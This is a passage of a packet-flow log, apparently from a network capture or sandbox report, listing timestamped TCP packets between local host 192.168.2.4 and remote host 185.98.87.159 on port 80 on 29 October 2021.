Oct 29, 2021 20:49:54.101284027 CEST	80	49789	185.98.87.159	192.168.2.4
Oct 29, 2021 20:49:54.101308107 CEST	80	49789	185.98.87.159	192.168.2.4
Oct 29, 2021 20:49:54.101319075 CEST	49789	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:49:54.101332903 CEST	80	49789	185.98.87.159	192.168.2.4
Oct 29, 2021 20:49:54.101346970 CEST	49789	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:49:54.101357937 CEST	80	49789	185.98.87.159	192.168.2.4
Oct 29, 2021 20:49:54.101382017 CEST	80	49789	185.98.87.159	192.168.2.4
Oct 29, 2021 20:49:54.101404905 CEST	49789	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:49:54.101406097 CEST	80	49789	185.98.87.159	192.168.2.4
Oct 29, 2021 20:49:54.101435900 CEST	80	49789	185.98.87.159	192.168.2.4
Oct 29, 2021 20:49:54.101460934 CEST	80	49789	185.98.87.159	192.168.2.4
Oct 29, 2021 20:49:54.101471901 CEST	49789	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:49:54.101485014 CEST	80	49789	185.98.87.159	192.168.2.4
Oct 29, 2021 20:49:54.101505995 CEST	49789	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:49:54.101527929 CEST	80	49789	185.98.87.159	192.168.2.4
Oct 29, 2021 20:49:54.101552010 CEST	80	49789	185.98.87.159	192.168.2.4
Oct 29, 2021 20:49:54.101577044 CEST	49789	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:49:54.101578951 CEST	80	49789	185.98.87.159	192.168.2.4
Oct 29, 2021 20:49:54.101603985 CEST	80	49789	185.98.87.159	192.168.2.4
Oct 29, 2021 20:49:54.101629019 CEST	80	49789	185.98.87.159	192.168.2.4
Oct 29, 2021 20:49:54.101629019 CEST	49789	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:49:54.101653099 CEST	80	49789	185.98.87.159	192.168.2.4
Oct 29, 2021 20:49:54.101672888 CEST	49789	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:49:54.101677895 CEST	80	49789	185.98.87.159	192.168.2.4
Oct 29, 2021 20:49:54.101701021 CEST	80	49789	185.98.87.159	192.168.2.4
Oct 29, 2021 20:49:54.101718903 CEST	49789	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:49:54.153064013 CEST	80	49789	185.98.87.159	192.168.2.4
Oct 29, 2021 20:49:54.153100967 CEST	80	49789	185.98.87.159	192.168.2.4
Oct 29, 2021 20:49:54.153125048 CEST	80	49789	185.98.87.159	192.168.2.4
Oct 29, 2021 20:49:54.153148890 CEST	80	49789	185.98.87.159	192.168.2.4
Oct 29, 2021 20:49:54.153173923 CEST	80	49789	185.98.87.159	192.168.2.4
Oct 29, 2021 20:49:54.153198004 CEST	80	49789	185.98.87.159	192.168.2.4
Oct 29, 2021 20:49:54.153222084 CEST	80	49789	185.98.87.159	192.168.2.4
Oct 29, 2021 20:49:54.153247118 CEST	80	49789	185.98.87.159	192.168.2.4
Oct 29, 2021 20:49:54.153270960 CEST	80	49789	185.98.87.159	192.168.2.4
Oct 29, 2021 20:49:54.153295040 CEST	80	49789	185.98.87.159	192.168.2.4
Oct 29, 2021 20:49:54.153317928 CEST	80	49789	185.98.87.159	192.168.2.4
Oct 29, 2021 20:49:54.153343916 CEST	80	49789	185.98.87.159	192.168.2.4
Oct 29, 2021 20:49:54.153367996 CEST	80	49789	185.98.87.159	192.168.2.4
Oct 29, 2021 20:49:54.153390884 CEST	80	49789	185.98.87.159	192.168.2.4
Oct 29, 2021 20:49:54.153413057 CEST	80	49789	185.98.87.159	192.168.2.4
Oct 29, 2021 20:49:54.153438091 CEST	80	49789	185.98.87.159	192.168.2.4
Oct 29, 2021 20:49:54.153461933 CEST	80	49789	185.98.87.159	192.168.2.4
Oct 29, 2021 20:49:54.153485060 CEST	80	49789	185.98.87.159	192.168.2.4
Oct 29, 2021 20:49:54.153507948 CEST	80	49789	185.98.87.159	192.168.2.4
Oct 29, 2021 20:49:54.153531075 CEST	80	49789	185.98.87.159	192.168.2.4
Oct 29, 2021 20:49:54.153554916 CEST	80	49789	185.98.87.159	192.168.2.4
Oct 29, 2021 20:49:54.153575897 CEST	80	49789	185.98.87.159	192.168.2.4
Oct 29, 2021 20:49:54.153599024 CEST	80	49789	185.98.87.159	192.168.2.4
Oct 29, 2021 20:49:54.153621912 CEST	80	49789	185.98.87.159	192.168.2.4
Oct 29, 2021 20:49:54.153644085 CEST	80	49789	185.98.87.159	192.168.2.4
Oct 29, 2021 20:49:54.153666973 CEST	80	49789	185.98.87.159	192.168.2.4
Oct 29, 2021 20:49:54.153688908 CEST	80	49789	185.98.87.159	192.168.2.4
Oct 29, 2021 20:49:54.153712034 CEST	80	49789	185.98.87.159	192.168.2.4
Oct 29, 2021 20:49:54.153733969 CEST	80	49789	185.98.87.159	192.168.2.4
Oct 29, 2021 20:49:54.153755903 CEST	80	49789	185.98.87.159	192.168.2.4
Oct 29, 2021 20:49:54.153780937 CEST	80	49789	185.98.87.159	192.168.2.4
Oct 29, 2021 20:49:54.153804064 CEST	80	49789	185.98.87.159	192.168.2.4
Oct 29, 2021 20:49:54.153826952 CEST	80	49789	185.98.87.159	192.168.2.4
Oct 29, 2021 20:49:54.153850079 CEST	80	49789	185.98.87.159	192.168.2.4
Oct 29, 2021 20:49:54.153872013 CEST	80	49789	185.98.87.159	192.168.2.4
Oct 29, 2021 20:49:54.153897047 CEST	80	49789	185.98.87.159	192.168.2.4
Oct 29, 2021 20:49:54.153922081 CEST	80	49789	185.98.87.159	192.168.2.4
Oct 29, 2021 20:49:54.153944016 CEST	80	49789	185.98.87.159	192.168.2.4
Oct 29, 2021 20:49:54.156263113 CEST	49789	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:49:54.207515001 CEST	80	49789	185.98.87.159	192.168.2.4
Oct 29, 2021 20:49:54.207554102 CEST	80	49789	185.98.87.159	192.168.2.4
Oct 29, 2021 20:49:54.207577944 CEST	80	49789	185.98.87.159	192.168.2.4
Oct 29, 2021 20:49:54.207580090 CEST	49789	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:49:54.207602978 CEST	80	49789	185.98.87.159	192.168.2.4
Oct 29, 2021 20:49:54.207624912 CEST	49789	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:49:54.207628012 CEST	80	49789	185.98.87.159	192.168.2.4
Oct 29, 2021 20:49:54.207653046 CEST	80	49789	185.98.87.159	192.168.2.4
Oct 29, 2021 20:49:54.207679033 CEST	80	49789	185.98.87.159	192.168.2.4
Oct 29, 2021 20:49:54.207701921 CEST	49789	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:49:54.207704067 CEST	80	49789	185.98.87.159	192.168.2.4
Oct 29, 2021 20:49:54.207727909 CEST	49789	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:49:54.207729101 CEST	80	49789	185.98.87.159	192.168.2.4
Oct 29, 2021 20:49:54.207757950 CEST	80	49789	185.98.87.159	192.168.2.4
Oct 29, 2021 20:49:54.207772970 CEST	49789	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:49:54.207786083 CEST	80	49789	185.98.87.159	192.168.2.4
Oct 29, 2021 20:49:54.207812071 CEST	80	49789	185.98.87.159	192.168.2.4
Oct 29, 2021 20:49:54.207834959 CEST	80	49789	185.98.87.159	192.168.2.4
Oct 29, 2021 20:49:54.207854033 CEST	49789	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:49:54.207859993 CEST	80	49789	185.98.87.159	192.168.2.4
Oct 29, 2021 20:49:54.207884073 CEST	80	49789	185.98.87.159	192.168.2.4
Oct 29, 2021 20:49:54.207909107 CEST	80	49789	185.98.87.159	192.168.2.4
Oct 29, 2021 20:49:54.207912922 CEST	49789	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:49:54.207932949 CEST	80	49789	185.98.87.159	192.168.2.4
Oct 29, 2021 20:49:54.207933903 CEST	49789	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:49:54.207957983 CEST	80	49789	185.98.87.159	192.168.2.4
Oct 29, 2021 20:49:54.207974911 CEST	49789	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:49:54.207982063 CEST	80	49789	185.98.87.159	192.168.2.4
Oct 29, 2021 20:49:54.208007097 CEST	80	49789	185.98.87.159	192.168.2.4
Oct 29, 2021 20:49:54.208031893 CEST	80	49789	185.98.87.159	192.168.2.4
Oct 29, 2021 20:49:54.208054066 CEST	49789	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:49:54.208055973 CEST	80	49789	185.98.87.159	192.168.2.4
Oct 29, 2021 20:49:54.208081961 CEST	80	49789	185.98.87.159	192.168.2.4
Oct 29, 2021 20:49:54.208082914 CEST	49789	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:49:54.208106041 CEST	80	49789	185.98.87.159	192.168.2.4
Oct 29, 2021 20:49:54.208127022 CEST	49789	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:49:54.208129883 CEST	80	49789	185.98.87.159	192.168.2.4
Oct 29, 2021 20:49:54.208153963 CEST	80	49789	185.98.87.159	192.168.2.4
Oct 29, 2021 20:49:54.208175898 CEST	49789	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:49:54.208178997 CEST	80	49789	185.98.87.159	192.168.2.4
Oct 29, 2021 20:49:54.208204985 CEST	80	49789	185.98.87.159	192.168.2.4
Oct 29, 2021 20:49:54.208220959 CEST	49789	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:49:54.208229065 CEST	80	49789	185.98.87.159	192.168.2.4
Oct 29, 2021 20:49:54.208255053 CEST	80	49789	185.98.87.159	192.168.2.4
Oct 29, 2021 20:49:54.208280087 CEST	80	49789	185.98.87.159	192.168.2.4
Oct 29, 2021 20:49:54.208293915 CEST	49789	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:49:54.208307028 CEST	80	49789	185.98.87.159	192.168.2.4
Oct 29, 2021 20:49:54.208318949 CEST	49789	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:49:54.208332062 CEST	80	49789	185.98.87.159	192.168.2.4
Oct 29, 2021 20:49:54.208354950 CEST	80	49789	185.98.87.159	192.168.2.4
Oct 29, 2021 20:49:54.208379030 CEST	80	49789	185.98.87.159	192.168.2.4
Oct 29, 2021 20:49:54.208394051 CEST	49789	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:49:54.208403111 CEST	80	49789	185.98.87.159	192.168.2.4
Oct 29, 2021 20:49:54.208420992 CEST	49789	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:49:54.261934042 CEST	80	49789	185.98.87.159	192.168.2.4
Oct 29, 2021 20:49:54.261970997 CEST	80	49789	185.98.87.159	192.168.2.4
Oct 29, 2021 20:49:54.261996031 CEST	80	49789	185.98.87.159	192.168.2.4
Oct 29, 2021 20:49:54.261998892 CEST	49789	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:49:54.262020111 CEST	80	49789	185.98.87.159	192.168.2.4
Oct 29, 2021 20:49:54.262034893 CEST	49789	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:49:54.262048006 CEST	80	49789	185.98.87.159	192.168.2.4
Oct 29, 2021 20:49:54.262073040 CEST	80	49789	185.98.87.159	192.168.2.4
Oct 29, 2021 20:49:54.262096882 CEST	80	49789	185.98.87.159	192.168.2.4
Oct 29, 2021 20:49:54.262105942 CEST	49789	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:49:54.262123108 CEST	80	49789	185.98.87.159	192.168.2.4
Oct 29, 2021 20:49:54.262145996 CEST	80	49789	185.98.87.159	192.168.2.4
Oct 29, 2021 20:49:54.262154102 CEST	49789	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:49:54.262170076 CEST	80	49789	185.98.87.159	192.168.2.4
Oct 29, 2021 20:49:54.262193918 CEST	80	49789	185.98.87.159	192.168.2.4
Oct 29, 2021 20:49:54.262203932 CEST	49789	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:49:54.262217999 CEST	80	49789	185.98.87.159	192.168.2.4
Oct 29, 2021 20:49:54.262233019 CEST	49789	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:49:54.262473106 CEST	80	49789	185.98.87.159	192.168.2.4
Oct 29, 2021 20:49:54.262499094 CEST	80	49789	185.98.87.159	192.168.2.4
Oct 29, 2021 20:49:54.262522936 CEST	80	49789	185.98.87.159	192.168.2.4
Oct 29, 2021 20:49:54.262546062 CEST	49789	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:49:54.262559891 CEST	80	49789	185.98.87.159	192.168.2.4
Oct 29, 2021 20:49:54.262579918 CEST	49789	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:49:54.263053894 CEST	80	49789	185.98.87.159	192.168.2.4
Oct 29, 2021 20:49:54.263082027 CEST	80	49789	185.98.87.159	192.168.2.4
Oct 29, 2021 20:49:54.263107061 CEST	80	49789	185.98.87.159	192.168.2.4
Oct 29, 2021 20:49:54.263128042 CEST	49789	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:49:54.263130903 CEST	80	49789	185.98.87.159	192.168.2.4
Oct 29, 2021 20:49:54.263159037 CEST	80	49789	185.98.87.159	192.168.2.4
Oct 29, 2021 20:49:54.263164043 CEST	49789	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:49:54.263185024 CEST	80	49789	185.98.87.159	192.168.2.4
Oct 29, 2021 20:49:54.263210058 CEST	80	49789	185.98.87.159	192.168.2.4
Oct 29, 2021 20:49:54.263217926 CEST	49789	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:49:54.263235092 CEST	80	49789	185.98.87.159	192.168.2.4
Oct 29, 2021 20:49:54.263279915 CEST	49789	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:49:54.263288975 CEST	80	49789	185.98.87.159	192.168.2.4
Oct 29, 2021 20:49:54.263365984 CEST	80	49789	185.98.87.159	192.168.2.4
Oct 29, 2021 20:49:54.263389111 CEST	49789	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:49:54.263394117 CEST	80	49789	185.98.87.159	192.168.2.4
Oct 29, 2021 20:49:54.263418913 CEST	80	49789	185.98.87.159	192.168.2.4
Oct 29, 2021 20:49:54.263443947 CEST	80	49789	185.98.87.159	192.168.2.4
Oct 29, 2021 20:49:54.263467073 CEST	49789	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:49:54.263468981 CEST	80	49789	185.98.87.159	192.168.2.4
Oct 29, 2021 20:49:54.263494015 CEST	49789	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:49:54.263494015 CEST	80	49789	185.98.87.159	192.168.2.4
Oct 29, 2021 20:49:54.263520002 CEST	80	49789	185.98.87.159	192.168.2.4
Oct 29, 2021 20:49:54.263540030 CEST	49789	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:49:54.314457893 CEST	80	49789	185.98.87.159	192.168.2.4
Oct 29, 2021 20:49:54.314486980 CEST	80	49789	185.98.87.159	192.168.2.4
Oct 29, 2021 20:49:54.314512014 CEST	80	49789	185.98.87.159	192.168.2.4
Oct 29, 2021 20:49:54.314534903 CEST	80	49789	185.98.87.159	192.168.2.4
Oct 29, 2021 20:49:54.314559937 CEST	49789	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:49:54.314599991 CEST	49789	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:49:54.314603090 CEST	80	49789	185.98.87.159	192.168.2.4
Oct 29, 2021 20:49:54.314629078 CEST	80	49789	185.98.87.159	192.168.2.4
Oct 29, 2021 20:49:54.314654112 CEST	80	49789	185.98.87.159	192.168.2.4
Oct 29, 2021 20:49:54.314668894 CEST	49789	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:49:54.314677954 CEST	80	49789	185.98.87.159	192.168.2.4
Oct 29, 2021 20:49:54.314698935 CEST	49789	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:49:54.314703941 CEST	80	49789	185.98.87.159	192.168.2.4
Oct 29, 2021 20:49:54.314749956 CEST	49789	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:49:54.314770937 CEST	80	49789	185.98.87.159	192.168.2.4
Oct 29, 2021 20:49:54.314798117 CEST	80	49789	185.98.87.159	192.168.2.4
Oct 29, 2021 20:49:54.314822912 CEST	80	49789	185.98.87.159	192.168.2.4
Oct 29, 2021 20:49:54.314836025 CEST	49789	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:49:54.314846039 CEST	80	49789	185.98.87.159	192.168.2.4
Oct 29, 2021 20:49:54.314870119 CEST	80	49789	185.98.87.159	192.168.2.4
Oct 29, 2021 20:49:54.314894915 CEST	80	49789	185.98.87.159	192.168.2.4
Oct 29, 2021 20:49:54.314896107 CEST	49789	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:49:54.314920902 CEST	80	49789	185.98.87.159	192.168.2.4
Oct 29, 2021 20:49:54.314934969 CEST	49789	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:49:54.314945936 CEST	80	49789	185.98.87.159	192.168.2.4
Oct 29, 2021 20:49:54.314970970 CEST	80	49789	185.98.87.159	192.168.2.4
Oct 29, 2021 20:49:54.314995050 CEST	80	49789	185.98.87.159	192.168.2.4
Oct 29, 2021 20:49:54.315011978 CEST	49789	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:49:54.315018892 CEST	80	49789	185.98.87.159	192.168.2.4
Oct 29, 2021 20:49:54.315042973 CEST	80	49789	185.98.87.159	192.168.2.4
Oct 29, 2021 20:49:54.315046072 CEST	49789	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:49:54.315068007 CEST	80	49789	185.98.87.159	192.168.2.4
Oct 29, 2021 20:49:54.315084934 CEST	49789	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:49:54.315093994 CEST	80	49789	185.98.87.159	192.168.2.4
Oct 29, 2021 20:49:54.315119028 CEST	80	49789	185.98.87.159	192.168.2.4
Oct 29, 2021 20:49:54.315141916 CEST	80	49789	185.98.87.159	192.168.2.4
Oct 29, 2021 20:49:54.315155983 CEST	49789	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:49:54.315165997 CEST	80	49789	185.98.87.159	192.168.2.4
Oct 29, 2021 20:49:54.315187931 CEST	49789	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:49:54.315190077 CEST	80	49789	185.98.87.159	192.168.2.4
Oct 29, 2021 20:49:54.315215111 CEST	80	49789	185.98.87.159	192.168.2.4
Oct 29, 2021 20:49:54.315224886 CEST	49789	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:49:54.315238953 CEST	80	49789	185.98.87.159	192.168.2.4
Oct 29, 2021 20:49:54.315263033 CEST	80	49789	185.98.87.159	192.168.2.4
Oct 29, 2021 20:49:54.315285921 CEST	49789	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:49:54.315285921 CEST	80	49789	185.98.87.159	192.168.2.4
Oct 29, 2021 20:49:54.315310955 CEST	80	49789	185.98.87.159	192.168.2.4
Oct 29, 2021 20:49:54.315325975 CEST	49789	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:49:54.315336943 CEST	80	49789	185.98.87.159	192.168.2.4
Oct 29, 2021 20:49:54.315361023 CEST	80	49789	185.98.87.159	192.168.2.4
Oct 29, 2021 20:49:54.315383911 CEST	80	49789	185.98.87.159	192.168.2.4
Oct 29, 2021 20:49:54.315398932 CEST	49789	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:49:54.315409899 CEST	80	49789	185.98.87.159	192.168.2.4
Oct 29, 2021 20:49:54.315433025 CEST	80	49789	185.98.87.159	192.168.2.4
Oct 29, 2021 20:49:54.315434933 CEST	49789	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:49:54.315458059 CEST	80	49789	185.98.87.159	192.168.2.4
Oct 29, 2021 20:49:54.315476894 CEST	49789	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:49:54.315479994 CEST	80	49789	185.98.87.159	192.168.2.4
Oct 29, 2021 20:49:54.315505028 CEST	80	49789	185.98.87.159	192.168.2.4
Oct 29, 2021 20:49:54.315515995 CEST	49789	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:49:54.315530062 CEST	80	49789	185.98.87.159	192.168.2.4
Oct 29, 2021 20:49:54.315555096 CEST	80	49789	185.98.87.159	192.168.2.4
Oct 29, 2021 20:49:54.315570116 CEST	49789	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:49:54.315579891 CEST	80	49789	185.98.87.159	192.168.2.4
Oct 29, 2021 20:49:54.315604925 CEST	80	49789	185.98.87.159	192.168.2.4
Oct 29, 2021 20:49:54.315629959 CEST	80	49789	185.98.87.159	192.168.2.4
Oct 29, 2021 20:49:54.315646887 CEST	49789	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:49:54.315653086 CEST	80	49789	185.98.87.159	192.168.2.4
Oct 29, 2021 20:49:54.315677881 CEST	80	49789	185.98.87.159	192.168.2.4
Oct 29, 2021 20:49:54.315681934 CEST	49789	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:49:54.315701962 CEST	80	49789	185.98.87.159	192.168.2.4
Oct 29, 2021 20:49:54.315721989 CEST	49789	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:49:54.315726042 CEST	80	49789	185.98.87.159	192.168.2.4
Oct 29, 2021 20:49:54.315747976 CEST	80	49789	185.98.87.159	192.168.2.4
Oct 29, 2021 20:49:54.315771103 CEST	80	49789	185.98.87.159	192.168.2.4
Oct 29, 2021 20:49:54.315793991 CEST	49789	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:49:54.315794945 CEST	80	49789	185.98.87.159	192.168.2.4
Oct 29, 2021 20:49:54.315820932 CEST	80	49789	185.98.87.159	192.168.2.4
Oct 29, 2021 20:49:54.315836906 CEST	49789	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:49:54.315843105 CEST	80	49789	185.98.87.159	192.168.2.4
Oct 29, 2021 20:49:54.315860033 CEST	49789	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:49:54.315865040 CEST	80	49789	185.98.87.159	192.168.2.4
Oct 29, 2021 20:49:54.315885067 CEST	80	49789	185.98.87.159	192.168.2.4
Oct 29, 2021 20:49:54.315901995 CEST	49789	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:49:54.315938950 CEST	80	49789	185.98.87.159	192.168.2.4
Oct 29, 2021 20:49:54.315963984 CEST	80	49789	185.98.87.159	192.168.2.4
Oct 29, 2021 20:49:54.316006899 CEST	49789	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:49:54.316936016 CEST	49789	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:49:54.367443085 CEST	80	49789	185.98.87.159	192.168.2.4
Oct 29, 2021 20:49:54.367471933 CEST	80	49789	185.98.87.159	192.168.2.4
Oct 29, 2021 20:49:54.367494106 CEST	80	49789	185.98.87.159	192.168.2.4
Oct 29, 2021 20:49:54.367513895 CEST	49789	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:49:54.367517948 CEST	80	49789	185.98.87.159	192.168.2.4
Oct 29, 2021 20:49:54.367542028 CEST	80	49789	185.98.87.159	192.168.2.4
Oct 29, 2021 20:49:54.367546082 CEST	49789	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:49:54.367564917 CEST	80	49789	185.98.87.159	192.168.2.4
Oct 29, 2021 20:49:54.367587090 CEST	49789	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:49:54.367607117 CEST	80	49789	185.98.87.159	192.168.2.4
Oct 29, 2021 20:49:54.367649078 CEST	49789	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:49:54.367933989 CEST	80	49789	185.98.87.159	192.168.2.4
Oct 29, 2021 20:49:54.367959023 CEST	80	49789	185.98.87.159	192.168.2.4
Oct 29, 2021 20:49:54.367980003 CEST	80	49789	185.98.87.159	192.168.2.4
Oct 29, 2021 20:49:54.368004084 CEST	80	49789	185.98.87.159	192.168.2.4
Oct 29, 2021 20:49:54.368016958 CEST	49789	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:49:54.368040085 CEST	80	49789	185.98.87.159	192.168.2.4
Oct 29, 2021 20:49:54.368051052 CEST	49789	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:49:54.368062973 CEST	80	49789	185.98.87.159	192.168.2.4
Oct 29, 2021 20:49:54.368086100 CEST	80	49789	185.98.87.159	192.168.2.4
Oct 29, 2021 20:49:54.368102074 CEST	49789	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:49:54.368108988 CEST	80	49789	185.98.87.159	192.168.2.4
Oct 29, 2021 20:49:54.368132114 CEST	80	49789	185.98.87.159	192.168.2.4
Oct 29, 2021 20:49:54.368155003 CEST	80	49789	185.98.87.159	192.168.2.4
Oct 29, 2021 20:49:54.368170023 CEST	49789	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:49:54.368176937 CEST	80	49789	185.98.87.159	192.168.2.4
Oct 29, 2021 20:49:54.368200064 CEST	80	49789	185.98.87.159	192.168.2.4
Oct 29, 2021 20:49:54.368207932 CEST	49789	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:49:54.368222952 CEST	80	49789	185.98.87.159	192.168.2.4
Oct 29, 2021 20:49:54.368244886 CEST	49789	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:49:54.368246078 CEST	80	49789	185.98.87.159	192.168.2.4
Oct 29, 2021 20:49:54.368269920 CEST	80	49789	185.98.87.159	192.168.2.4
Oct 29, 2021 20:49:54.368288994 CEST	49789	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:49:54.368292093 CEST	80	49789	185.98.87.159	192.168.2.4
Oct 29, 2021 20:49:54.368315935 CEST	80	49789	185.98.87.159	192.168.2.4
Oct 29, 2021 20:49:54.368339062 CEST	80	49789	185.98.87.159	192.168.2.4
Oct 29, 2021 20:49:54.368339062 CEST	49789	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:49:54.368361950 CEST	80	49789	185.98.87.159	192.168.2.4
Oct 29, 2021 20:49:54.368381977 CEST	49789	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:49:54.368383884 CEST	80	49789	185.98.87.159	192.168.2.4
Oct 29, 2021 20:49:54.368407011 CEST	80	49789	185.98.87.159	192.168.2.4
Oct 29, 2021 20:49:54.368424892 CEST	49789	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:49:54.368431091 CEST	80	49789	185.98.87.159	192.168.2.4
Oct 29, 2021 20:49:54.368457079 CEST	80	49789	185.98.87.159	192.168.2.4
Oct 29, 2021 20:49:54.368469000 CEST	49789	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:49:54.368479967 CEST	80	49789	185.98.87.159	192.168.2.4
Oct 29, 2021 20:49:54.368503094 CEST	80	49789	185.98.87.159	192.168.2.4
Oct 29, 2021 20:49:54.368525982 CEST	80	49789	185.98.87.159	192.168.2.4
Oct 29, 2021 20:49:54.368541956 CEST	49789	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:49:54.368549109 CEST	80	49789	185.98.87.159	192.168.2.4
Oct 29, 2021 20:49:54.368572950 CEST	80	49789	185.98.87.159	192.168.2.4
Oct 29, 2021 20:49:54.368580103 CEST	49789	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:49:54.368596077 CEST	80	49789	185.98.87.159	192.168.2.4
Oct 29, 2021 20:49:54.368616104 CEST	49789	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:49:54.368618965 CEST	80	49789	185.98.87.159	192.168.2.4
Oct 29, 2021 20:49:54.368643999 CEST	80	49789	185.98.87.159	192.168.2.4
Oct 29, 2021 20:49:54.368665934 CEST	80	49789	185.98.87.159	192.168.2.4
Oct 29, 2021 20:49:54.368690014 CEST	49789	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:49:54.368695974 CEST	80	49789	185.98.87.159	192.168.2.4
Oct 29, 2021 20:49:54.368719101 CEST	80	49789	185.98.87.159	192.168.2.4
Oct 29, 2021 20:49:54.368741035 CEST	80	49789	185.98.87.159	192.168.2.4
Oct 29, 2021 20:49:54.368752003 CEST	49789	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:49:54.368763924 CEST	80	49789	185.98.87.159	192.168.2.4
Oct 29, 2021 20:49:54.368786097 CEST	80	49789	185.98.87.159	192.168.2.4
Oct 29, 2021 20:49:54.368791103 CEST	49789	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:49:54.368809938 CEST	49789	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:49:54.368809938 CEST	80	49789	185.98.87.159	192.168.2.4
Oct 29, 2021 20:49:54.368834972 CEST	80	49789	185.98.87.159	192.168.2.4
Oct 29, 2021 20:49:54.368856907 CEST	49789	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:49:54.368870974 CEST	80	49789	185.98.87.159	192.168.2.4
Oct 29, 2021 20:49:54.368894100 CEST	80	49789	185.98.87.159	192.168.2.4
Oct 29, 2021 20:49:54.368915081 CEST	80	49789	185.98.87.159	192.168.2.4
Oct 29, 2021 20:49:54.368932009 CEST	49789	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:49:54.368937969 CEST	80	49789	185.98.87.159	192.168.2.4
Oct 29, 2021 20:49:54.368961096 CEST	80	49789	185.98.87.159	192.168.2.4
Oct 29, 2021 20:49:54.368963957 CEST	49789	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:49:54.368983030 CEST	80	49789	185.98.87.159	192.168.2.4
Oct 29, 2021 20:49:54.368999958 CEST	49789	80	192.168.2.4	185.98.87.159
